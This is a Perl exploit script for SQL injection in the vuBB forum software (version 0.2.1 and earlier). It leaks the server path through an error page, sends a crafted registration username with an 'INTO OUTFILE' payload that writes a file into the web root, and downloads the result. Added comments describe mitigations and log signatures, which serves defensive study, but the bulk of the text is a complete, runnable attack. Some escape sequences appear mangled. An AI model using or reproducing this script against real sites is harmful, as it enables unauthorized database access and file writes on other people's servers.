#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;
# Header
#
# Flow of the script as written below: (1) request includes/vubb.php directly
# and scrape the server's absolute path from the error text it returns,
# (2) POST the registration form with a crafted username, (3) GET the file the
# injected query is expected to have written under the web root and save it
# locally. Each stage leaves a distinctive web-server log entry; the per-stage
# notes say what a defender should look for and how to close the hole.
print "rn+---------------------------------------+", "rn";
print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "rn";
print "+---------------------------------------+", "rn";
# Usage
# Three positional arguments are required. The presence check is a truth test
# on the third one, so a username of "0" is also treated as missing.
if(!$ARGV[2]){
print "| Usage: <host> <path> <username> ------|", "rn";
print "+---------------------------------------+", "rn";
exit;
}
# Host
# Intended to accept the host with or without a leading http:// scheme and keep
# only the host part for the Host header and socket connection below.
if($ARGV[0] =~ /http://(.*)/){
$host = $1;
} else {
$host = $ARGV[0];
}
print "[+]Host: $hostrn";
# Var
my $path = $ARGV[1];
my $user = $ARGV[2]; print "[+]User: $userrn";
my $port = 80;
# URL of an include file requested on its own (stage 1 target).
my $fpd = "http://".$host.$path."includes/vubb.php";
my $err1 = "[-]Can't connect to the hostrn";
my $err2 = "[-]Can't retrieve the full pathrn";
my $err3 = "[-]Can't retrieve the resultsrn";
# Request line for the registration handler (stage 2 target).
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";
# Full Path Disclosure
# Stage 1 -- relies on the server answering the direct include request with an
# error message of the form "in <b>/abs/path/includes/vubb.php</b>"; the
# directory part is captured and reused as the output location in stage 2.
# Mitigation: deny direct HTTP access to includes/ and keep display_errors off
# in production so errors go to the server log, not the response body.
# Detection: a GET for includes/vubb.php from a client that then POSTs to the
# registration handler.
# Note: `die print $err1 and end()` parses as `(die print $err1) and end()`, so
# on a fetch failure the process dies before end() is reached and the closing
# banner is never printed.
$req0 = get($fpd) or die print $err1 and end();
if($req0 =~ /in <b>(.*)/includes/vubb.php</b>/) {
$fullpath = $1."/thisismypasswd.txt";
print "[+]Path: $1rn";
} else {
print $err2 and end();
}
# Malicious data
# Stage 2 -- the username field carries a SQL INTO OUTFILE clause pointing at
# the path found above; %27 is a quote and %23 is '#', which comments out the
# remainder of the application's statement. The remaining form fields are just
# fillers to pass the registration validation.
# This only succeeds when the application concatenates the username into its
# SQL, the DB account holds the MySQL FILE privilege, and the target directory
# is writable by the database server.
# Mitigation: parameterised queries / input validation on the username; remove
# FILE from the application's DB account; no DB-writable directories under the
# document root.
# Detection: a POST to index.php?act=register whose body contains
# "INTO OUTFILE" (URL-encoded as INTO+OUTFILE) followed by an unexpected new
# .txt file appearing in the web root.
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c45
70f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=
mypassword&agreement=iacceptohackit&agree=on";
my $ldat = length $pdat;
# The POST is hand-built over a raw TCP socket (request line, Host,
# Content-Type, Content-Length, body) rather than through LWP; the response is
# never read before the socket is closed, so success is not checked here.
my $req1 = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) or print $err1 and end();
print $req1 "$poti", "rn";
print $req1 "Host: $host", "rn";
print $req1 "Content-Type: application/x-www-form-urlencoded", "rn";
print $req1 "Content-Length: $ldat", "rnn";
print $req1 "$pdat", "rn";
close($req1);
# Results
# Stage 3 -- the file the injected query was meant to write is fetched back over
# HTTP and stored locally. Bareword filehandle, 2-arg open and unchecked
# open/close here: tolerable for a fixed local filename, but not an idiom to
# copy (3-arg open with a lexical handle and `or die` is the correct form).
# Detection: a GET for thisismypasswd.txt in the web root shortly after the
# registration POST.
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();
open(f, ">VUBB_RESULT.txt");
print f $req2;
close(f);
print "[+]Done: VUBB_RESULT.txtrn";
end();
# Bye
# Bye: print the closing banner line and terminate the process.
# Never returns (calls exit); no arguments are read.
sub end {
    my $footer = "+---------------------------------------+";
    print $footer, "rn";
    exit;
}